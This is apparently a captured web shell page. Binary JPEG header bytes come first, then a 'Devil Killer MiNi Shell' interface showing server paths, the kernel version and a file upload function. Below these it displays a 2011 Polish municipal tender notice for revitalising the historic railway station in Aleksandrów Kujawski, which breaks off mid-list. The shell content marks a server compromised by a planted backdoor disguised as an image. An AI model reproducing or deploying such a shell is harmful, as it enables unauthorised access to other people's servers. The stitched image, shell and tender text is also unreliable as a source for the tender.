JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111014/271003-N-2011.html

<p class="kh_header"><b>Aleksandrów Kujawski: Rewitalizacja zabytkowego dworca kolejowego
w Aleksandrowie Kujawskim - Etap 1</b><br>
<b>Numer ogłoszenia: 271003 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Aleksandrowa Kujawskiego , ul. Słowackiego 8, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2824855, faks 054 2822101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aleksandrowkujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja zabytkowego dworca kolejowego
w Aleksandrowie Kujawskim - Etap 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem niniejszego zamówienia jest realizacja zadania w systemie zaprojektuj i wybuduj pn.: Rewitalizacja zabytkowego dworca kolejowego w Aleksandrowie Kujawskim - etap 1. Budynek ma w przyszłości pełnić funkcję kulturalno - edukacyjno- informacyjną.
Budynek będzie miejscem spotkań i integracji lokalnej społeczności, promocji miasta,
punktem informacji, miejscem imprez kulturalnych, wypoczynku.
Głównym warunkiem rewitalizacji dworca jest zachowanie jego unikalnego XIX wiecznego klimatu. Budynek wchodzi w skład zabytkowego zespołu dworca kolejowego i wpisany został do rejestru zabytków pod nr 423/A decyzją Wojewódzkiego Konserwatora Zabytków we Włocławku.
3.2. Budynek zlokalizowany jest na działce nr 16/10 w Aleksandrowie Kujawskim.
1) Działka, na której zlokalizowany jest dworzec to zabytkowe założenie, które wraz z przylegającym do niej Parkiem Miejskim będzie przedmiotem odrębnego opracowania. Obsługa komunikacyjna - dojazd i dojścia do budynku pozostają bez zmian.Zasilanie rewitalizowanego dworca w media z istniejących przyłączy wod.-kan., elektrycznej i teletechnicznej oraz cieplnej.
Odprowadzenie wód opadowych - bez zmian.
Gromadzenie odpadów - istniejące pojemniki służące do czasowego gromadzenia odpadów stałych.
Projektowana przebudowa wpływa na zwiększenie zapotrzebowania na wodę, energię elektryczną, odprowadzenie ścieków. Budynek posiada ogrzewanie piecowe. Docelowo ogrzewany będzie z elektrociepłowni miejskiej.
Powierzchnia zabudowy, powierzchnie utwardzone i tereny zielone pozostają bez zmian.
2) Charakterystyka budynku
Budynek dworca PKP w Aleksandrowie Kujawskim to obecnie obiekt wielofunkcyjny,
użytkowany jako dworzec kolejowy z zapleczem oraz częściowo jako handlowo-usługowy i mieszkaniowy. Wybrane kompleksy pomieszczeń są nie użytkowane. Obiekt piętrowy, częściowo podpiwniczony, z dachem dwuspadowym wielopłaszczyznowym,kryty blachą.
Elewacja tynkowana z licznymi zdobieniami w stylu klasycystycznym.
Budynek na planie prostokątów, niesegmentowy w rzucie i w bryle o wymiarach w rzucie: 194,70 m x 23,98 m
Budynek dworca jest obiektem wolno stojącym, z dostępem do drogi publicznej, z
przylegającymi peronami dworcowymi i towarzyszącymi obiektami i urządzeniami
technicznymi obsługi kolei.
3) Opis elementów konstrukcyjnych
Fundamenty i ściany piwnic - nie ustalono wymiarów ław fundamentowych, gdyż nie
dokonano odkrywek.
Ściany zewnętrzne - murowane z cegły ceramicznej pełnej na zaprawie wapiennej,
dwustronnie otynkowane.
Ściany wewnętrzne - murowane z cegły ceramicznej pełnej, dwustronnie otynkowane. Pod względem konstrukcyjnym stan techniczny ścian - dobry.
Konstrukcja dachowa - więźba drewniana. Stan techniczny - dostateczny z elementami do wymiany.
Pokrycie dachowe. Budynek kryty blachą arkuszową kładzioną na rąbek stojący. Ogólny stan techniczny pokrycia dachowego - zły.
Elewacje - cegła elewacyjna z elementami tynkowanymi zaprawą wapienną - stan
techniczny - zły. Część elewacji od strony wschodniej - westybul - jest wyremontowany i nie objęty rewitalizacją - 1 etap.
4) Opis elementów wykończenia budynku:
tynki - stan techniczny - bardzo zły,
ścianki działowe - stan techniczny - zły,
stolarka - nietypowa, drewniana, stan techniczny - zły,
sztukateria zewnętrzna elewacyjna i wewnętrzna - stan techniczny zły, liczne ubytki.
Podstawowe dane
- pow. zabudowy całego budynku - 3 452,00 m2
- pow. zabudowy - etap 1 - 2 001,20 m2
- pow. netto - etap 1 - 2 731,60 m2
- pow. użytkowa - etap 1 - 1 886,80 m2
3.2. Zakres przedmiotu zamówienia obejmuje:
1) Wykonanie dokumentacji projektowo-kosztorysowej:
a) koncepcji projektowej - 3 egz,
b) projektu budowlanego- 5 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD,
c) projektów wykonawczych wszystkich branż - 5 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD,
d) specyfikacji technicznej wykonania i odbioru robót budowlanych- 2 egz. w wersji
papierowej wraz z wersją elektroniczną na płycie CD,
e) przedmiaru robót-2 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD,
f) kosztorysu inwestorskiego-2 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD,
g) planu bezpieczeństwa i ochrony zdrowia (BIOZ) 2 egz. w wersji papierowej wraz z wersją elektroniczną na płycie CD,
h) uzyskanie wszelkich niezbędnych uzgodnień, opinii bądź decyzji administracyjnych i technicznych niezbędnych do rozpoczęcia robót wykonawczych ,
i) przygotowanie odpowiednich dokumentów formalno-prawnych i uzyskanie na ich
podstawie w imieniu Zamawiającego decyzji właściwego organu na przeprowadzenie robót w oparciu o obowiązujące przepisy,
j) sprawowanie nadzoru autorskiego.
Kompletna dokumentacja projektowa winna zawierać następujące branże:
a) architektura,
b) konstrukcja,
c) instalacja wodno-kanalizacyjna,
d) instalacja wentylacyjna, klimatyzacyjna,
e) instalacja centralnego ogrzewania,
f) instalacja elektryczna i oświetleniowa,
g) instalacja teletechniczna,
h) audiowizualna
- system prezentacji obrazów,
- system nagłośnieniowy,
- system podglądu obrazu,
- system centralnego sterowania, w tym system zaciemnienia sali,
- system wideokonferencji.
2) Wykonanie robót budowlanych w oparciu o opracowaną i zatwierdzoną dokumentację
projektową:
a) wtórny podział części pomieszczeń poprzez wyburzenie i wymurowanie nowych ścian działowych z gazobetonu,
b) wydzielenie nowych pomieszczeń higieniczno-sanitarnych + biały montaż,
c) okładzina ścian z płytek ceramicznych,
d) renowacja detalu architektonicznego wewnętrznego (bez sali idowiskowokonferencyjnej) i zewnętrznego wraz z rekonstrukcją zniszczonych elementów,
e) renowacja drewnianych okładzin ściennych wraz z rekonstrukcją zniszczonego detalu (bez sali widowiskowo-konferencyjnej),
f) wymiana zniszczonych nawierzchni podłogowych i posadzek na parkiet, płytki
ceramiczne, panele drewniane (bez sali wystawienniczo -konferencyjnej),
g) wymiana okien na drewniane, zespolone, dzielone, uchylno-rozwieralne z odtworzeniem podziału, z wbudowanymi nawiewnikami hydrostatycznymi oraz wymianą parapetów wewnętrznych na drewniane,
h) remont wraz z rekonstrukcją i montaż stolarki drzwiowej na płycinową, drewnianą,
i) remont konstrukcji dachu z odtworzeniem zniszczonych w około 40% elementów
konstrukcyjnych drewnianej więźby dachowej bez części dachu nad projektowanymi
pomieszczeniami czytelni i medioteki oraz części wspólnej korytarza,
j) wymiana pokrycia dachowego - blacha tytan-cynk. (wraz z salą wystawienniczokonferencyjną) bez części dachu położonej nad projektowanymi pomieszczeniami czytelni i medioteki oraz części wspólnej korytarza,
k) usunięcie starej malatury ściennej i na stropach (bez sali widowiskowo-konferencyjnej),
l) malowanie wszystkich pomieszczeń (bez sali widowiskowo-konferencyjnej),
m) remont stalowych elementów konstrukcyjnych (bez sali widowiskowo-konferencyjnej),
n) wymiana parapetów zewnętrznych na ceramiczne,
o) wykonanie nowych tynków gładkich zewnętrznych,
p) wykonanie nowych tynków gładkich wewnętrznych (bez sali widowiskowo-konferencyjnej),
q) przebudowa instalacji wod-kan. wraz z wymianą pionów kanalizacji sanitarnej,
r) budowa wewnętrznej instalacji c.o. wraz z wymiennikownią (wraz z salą widowiskowokonferencyjną),
s) przygotowanie otworów nawiewnych i wywiewnych wentylacji mechanicznej i klimatyzacji
w stropach lub ścianach (bez sali widowiskowo-konferencyjnej),
t) przebudowa i wymiana instalacji elektrycznej,
u) montaż instalacji teletechnicznej i audiowizualnej (bez sali widowiskowo-konferencyjnej),
v) zamontowanie na czas realizacji robót tablicy informacyjnej - 1szt., a po zakończeniu realizacji tablicy pamiątkowej - 1 szt. (tablice muszą spełniać wymagania określone w Wytycznych dla beneficjentów z zakresu promocji projektów realizowanych w ramach RPO WK-P - dokument zamieszczony na stronie internetowej: www.mojregion.eu/regionalnyprogram-operacyjny-wojewodztwa-kujawsko-pomorskiego/promocja/oznakowanieprojektu.html
w) umieszczenie 2 artykułów prasowych o zasięgu lokalnym (1 przed rozpoczęciem realizacji i 1 na koniec realizacji)
x) wydanie ulotek informacyjnych o Projekcie na dzień odbioru końcowego obiektu.
Treść artykułów i ulotek zostanie uzgodniona z Zamawiającym.
3.3. Po odbiorze końcowym Wykonawca uzyska pozwolenie na użytkowanie, spełniając wymagania ustawy Prawo budowlane. Wykonawca przedstawi  Zamawiającemu dokumentację budowy w tym dokumentację powykonawczą.
3.4. Powstały w wyniku realizacji projektu pn.: Rewitalizacja dworca kolejowego
w Aleksandrowie Kujawskim - etap 1 obiekt będzie pełnić następujące funkcje:
 szkoleniowo-widowiskową, mającą na celu:
- organizowanie imprez kulturalnych, spektakli, koncertów, imprez, które maja już swoją tradycję, których organizacja wymaga pracy całego sztabu ludzi i współpracy różnych instytucji,
- organizowanie obchodów świat narodowych oraz uroczystości miejskich,
- świadczenie usług z zakresu kultury,
- tworzenie warunków dla rozwoju amatorskiego ruchu artystycznego oraz zainteresowania wiedzą i sztuką,
 wystawienniczą powiązaną z sal widowiskowo-konferencyjną,
 turystyczno-edukacyjno-informacyjną, mającą na celu:
- wykreowanie produktu turystycznego - dworca,
- rozpoznawanie, rozbudzanie i zaspokajanie potrzeb oraz zainteresowań kulturalnych poprzez organizację wystaw wraz z imprezami artystycznymi związanymi z wystawami, prezentacją twórczości młodzieży,
- gromadzenie, dokumentowanie, tworzenie, ochrona i udostępnianie dóbr kultury poprzez lokalizację na terenie budynku biblioteki wraz z medioteką, w której będą gromadzone wszelkie publikacje informatyczne (słowniki, podręczniki, prasa obcojęzyczna, kasety video, kasety magnetofonowe, CD, programy dydaktyczne). Integralną częścią medioteki jest czytelnia przeznaczona do przeglądania zbiorów z wykorzystaniem komputera i zestawu audio-video.
Obok wymienionych funkcji przewiduje się pomieszczenia dla organizacji pozarządowych,
Centrum Współpracy Wschód-Zachód.
Całość zlokalizowana jest w poziomie parteru i jest dostępna dla osób niepełnosprawnych. 
Planowane przedsięwzięcie nie wpływa ujemnie na środowisko i nie narusza praw osóbtrzecich.
3.5. Szczegółowe właściwości funkcjonalno-użytkowe
Parter
1) holl główny - 242,00 m2
2) stróżówka - 7,60 m2
3) komunikacja, strefa wystawiennicza - 63,60 m2
4) sanitariat damski - 37,90 m2
5) aneks szatniowy - 8,90 m2
6) WC NPS - 5,50 m2
7) sanitariat męski - 24,70 m2
8) pomieszczenie porządkowe - 4,50 m2
9) główna rozdzielnia - 23,30 m2
10) sala widowiskowo-konferencyjna - 414,40 m2
11) wymiennikownia - 16,60 m2
12) magazyn sprzętu - 27,50 m2
13) organizacje pozarządowe - 60,00 m2
14) strefa wystawiennicza - 89,00 m2
15) pomieszczenie administracyjne - 24,10 m2
16) komunikacja - 143.40 m2
17) wypożyczalnia - 160,00 m2
18) korytarz - 14,50 m2
19) korytarz - 7,80 m2
20) sanitariat - 8,20 m2
21) pomieszczenie administracyjne - 40,00 m2
22) czytelnia - 61,50 m2
23) medioteka - 88,10 m2
24) pomieszczenie techniczne - 11,00 m2
25) pomieszczenie sprzątaczek - 15,70 m2
26) pomieszczenie biurowe - 13,10 m2
27) pomieszczenie biurowe - 31,80 m2
28) sanitariat - 5,20 m2
29) informacja turystyczna - 8,90 m2
Razem: 1 658,80 m2
Poddasze
30) wentylatorownia, klimatyzatorownia - 228,00 m2
31) poddasze - 842,00 m2
Razem: 1 070,00 m2
Razem Pu = 1886,80 m2
3.6. Wymagania ogólne dla autorów projektu i wykonawców
Opracowanie projektowe winno uwzględnić już wykonane prace remontowe obejmujące część elewacji wschodniej - westybul - oraz finansowanie remontu dachu z różnych źródeł. Zamawiający będzie wymagał, aby organizacja robót, jakość użytych wyrobów i jakość wykonania były na poziomie wyższym od przeciętnego. Zamawiający będzie kontrolował w tym zakresie działania
Wykonawcy.
3.7. Szczegółowy zakres rzeczowy przedmiotu zamówienia określony jest w dokumentacji załączonej do niniejszej SIWZ:
 Program Funkcjonalno-Użytkowy pn-Rewitalizacja zabytkowego dworca kolejowego-etap 1 ,
 inwentaryzację rysunkową,
koncepcję architektoniczną funkcjonalno-przestrzenną przebudowy budynku-etap 1
3.8. Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego podczas realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.00.00.00-0, 45.44.21.00-8, 45.45.00.00-6, 45.41.00.00-4, 45.42.11.00-5, 45.31.00.00-3, 45.31.40.00-1, 45.33.23.00-6, 45.33.22.00-5, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium - każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 35.000,00 zł (trzydzieści pięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku, posiadania uprawnień do wykonywania określonej działalności lub
czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa
oświadczenie o spełnianiu warunku zgodnie z wzorem nr 2 - ocena spełnienia tego
warunku będzie dokonana na podstawie złożonego przez Wykonawcę oświadczenia
o spełnieniu warunku zgodnie z wzorem nr 2;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania wiedzy i doświadczenia Wykonawca wykaże, iż w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie) przed upływem terminu składania ofert, wykonał co najmniej jedną robotę budowlaną polegającą na kompleksowym wykonaniu remontu i rewitalizacji obiektu zabytkowego wpisanego do rejestru zabytków o wartości co najmniej 1.000.000,00 zł oraz zrealizował co najmniej jedną robotę budowlaną polegającą na zaprojektowaniu i wybudowaniu lub remoncie, w ramach jednego postępowania, obiektu użyteczności publicznej o kubaturze nie mniejszej niż 4000 m3 wraz z uzyskaniem pozwolenia na użytkowanie. Do wykazu wykonanych robót należy dołączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, np. referencje.
Ocena spełniania warunku nastąpi na podstawie wypełnionego przez Wykonawcę wzoru - załącznik nr 4 do SIWZ oraz złożonego oświadczenia o spełnianiu warunku zgodnie z wzorem nr 2 do SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełniania tego warunku spowoduje wykluczenie z postępowania, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z wzorem nr 2 do
SIWZ, że dysponuje potencjałem technicznym potrzebnym do wykonania zamówienia.
Ocena spełniania warunku nastąpi na podstawie załączonego do oferty oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonania zmówienia Wykonawca wykaże, że dysponuje wykwalifikowanym potencjałem kadrowym:
- koordynator projektu (Główny Projektant):
 posiadający uprawnienia w specjalności architektoniczno-budowlanej bez ograniczeń, oraz uprawnienia do wykonywania prac projektowych w specjalności architektonicznej przy zabytkach nieruchomych
 posiadający min. 10 letnie doświadczenie w projektowaniu obiektów kubaturowych, w tym zaprojektowanie rewitalizacji co najmniej 2 (dwóch) obiektów zabytkowych o kubaturach nie mniejszych niż 4000 m3,
- kierownik budowy posiadający min. 5 - letnie doświadczenie w pełnieniu funkcji kierownika budowy w specjalności konstrukcyjno-budowlanej bez ograniczeń, w tym przy rewitalizacji / remoncie co najmniej jednego obiektu zabytkowego,
- kierownicy branżowi robót z uprawnieniami bez ograniczeń we wszystkich branżach podanych poniżej posiadających co najmniej 3-letnie doświadczenie zawodowe podczas pełnienia samodzielnych funkcji technicznych w budownictwie w następujących specjalnościach:
- architektonicznej bez ograniczeń lub konstrukcyjno - budowlanej bez ograniczeń
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,
wodociągowych i kanalizacyjnych bez ograniczeń,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
Wykonawca winien dołączyć kopie dokumentów potwierdzających posiadanie w/w uprawnień, ważne na dzień składnia ofert i kopie aktualnych zaświadczeń potwierdzające przynależność tych osób do właściwej izby samorządu zawodowego oraz przedstawić zakres wykonywanych przez nie czynności i podstawę do dysponowania tymi osobami.
- konserwatora zabytków, który posiada dyplom ukończenia studiów ze specjalizacją - konserwacja kamienia i detali architektonicznych;
- udokumentować, iż posiada laboratorium chemiczne wykonujące badania mykologiczne lub oświadczenie laboratorium, że wykona te badania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej
zapewniającej wykonanie zamówienia dla wykazania, że Wykonawca spełnia warunek Zamawiający żąda, by Wykonawca złożył:
- opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument
potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej
1.000.000,00 zł
- środki finansowe lub zdolność kredytową w wysokości min. 2.000.000,00 PLN
(słownie: dwa miliony i 00/100 PLN)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

